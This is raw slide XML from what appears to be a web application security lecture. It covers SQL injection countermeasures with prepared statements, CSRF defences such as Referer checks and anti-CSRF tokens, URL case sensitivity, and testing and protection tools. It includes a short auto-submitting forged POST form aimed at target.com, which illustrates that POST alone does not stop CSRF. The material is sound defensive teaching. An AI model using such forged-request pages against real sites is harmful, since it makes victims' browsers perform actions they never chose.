              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>stringAttrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/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”, “forbidden”, $tag);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br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343" y="514520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all the events…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Countermeasures: SQLI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prepared statements instead of composing query by hand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2200" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>db = mysqli_init();</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$stmt = mysqli_prepare($db, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  “SELECT id FROM authors “ .</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  “WHERE name = ?”);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mysqli_stmt_bind_param($stmt, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  “s”, $_GET[“name”]);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mysqli_stmt_execute($stmt);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2200" smtClean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CSRF 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Use POST instead of GET requests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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Easy for an attacker to generate POST requests:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;form id=“f” action=“http://target.com/”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            method=“post”&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;input name=“p” value=“42”&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> f = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700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sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(‘f’);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f.submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;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700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US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CSRF 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Use POST instead of GET requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Easy for an attacker to generate POST requests:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;form id=“f” action=“http://target.com/”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            method=“post”&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;input name=“p” value=“42”&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  var f = document.getElementById(‘f’);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  f.submit();</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;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sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2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CSRF countermeasures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 the value of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> header of incoming requests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CSRF countermeasures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 the value of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> header of incoming requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Attacker cannot spoof the value of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> header (modulo bugs in the browser)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CSRF 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Check the value of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> header of incoming requests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Attacker cannot spoof the value of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> header (modulo bugs in the browser)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rgbClr val="953735"/>
                </a:solidFill>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Legitimate requests may be stripped of their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> header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953735"/>
                </a:solidFill>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Proxies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olidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web application firewalls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CSRF countermeasures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 time a form is served, add an additional parameter with a secret value (token) and check that it is valid upon submission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2600" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;form&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  &lt;input …&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  &lt;input name=“anticsrf” type=“hidden” </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>         value=“asdje8121asd26n1”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr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Case Sensitivity in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URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800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case-sensitive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The protocol identifier HTTP and HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The name of the machine (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.example.com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3"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>It is the Domain Name System (DNS) name of the server, and DNS is officially not case-sensitive</a:t>
            </a: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800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>P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robably case-sensitive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1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user ID and password (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fred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and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wilma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in our example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) (Depend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on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server software)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>They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may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also depend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on the application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itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1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resource section is hard to know.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IN" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>private.asp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- a Windows Active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Server Pages extension, that suggests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request to a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Windows server system-not case-sensitive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>On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a Unix system running Apache, it will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be case-sensitive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CSRF countermeasures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 time a form is served, add an additional parameter with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>secret value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (token) and check that it is valid upon submission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the attacker can guess the token value, then no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CSRF countermeasures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Every time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>a form is served, add an additional parameter with a secret value (token) and check that it is valid upon submission</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="953735"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the token is not regenerated each time a form is served, the application may be vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
              <a:t>replay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="953735"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacks  (nonce)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Tools: source code analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77827" name="Content Placeholder 4" descr="lap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21028" r="-21028"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1417638"/>
            <a:ext cx="8229600" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77828" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="5943600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LAPSE: Web Application Security Scanner for Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://suif.stanford.edu/~livshits/work/lapse/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Tools: request tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="78851" name="Content Placeholder 3" descr="livehttphead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27547" r="-27547"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1176338"/>
            <a:ext cx="8229600" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78852" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="5702300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Live HTTP Headers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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://addons.mozilla.org/en-US/firefox/addon/3829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Tools: burp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5883275"/>
            <a:ext cx="8229600" cy="738188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smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.portswigger.net/suite/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79876" name="Picture 3" descr="bur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6213" y="1173163"/>
            <a:ext cx="622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Tools: web application scanners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Tools to automatically find vulnerabilities in web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>applications</a:t>
            </a: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Tools: mod_security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81923" name="Content Placeholder 3" descr="modsecuri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32211" r="-32211"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81924" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="612616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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.modsecurity.org/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Tools: PHPIDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82947" name="Content Placeholder 3" descr="phpid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32211" r="-32211"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82948" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="612616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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://php-ids.org/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Tools: log analyzers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83971" name="Content Placeholder 3" descr="l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37929" r="-37929"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1417638"/>
            <a:ext cx="8229600" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83972" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="617696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Tools: logwatch, SWATCH,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Client server based HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>from the view of testing methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Clients </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>make requests, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>servers respond</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>possible for a server to decide “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>that computer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>over there needs some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>data. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>connect to it and send the data.” </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Clients </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>like web browsers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>and Flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>applets can be programmed to poll a server, making regular requests at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>intervals or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>at specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>times</a:t>
            </a:r>
          </a:p>
          <a:p>
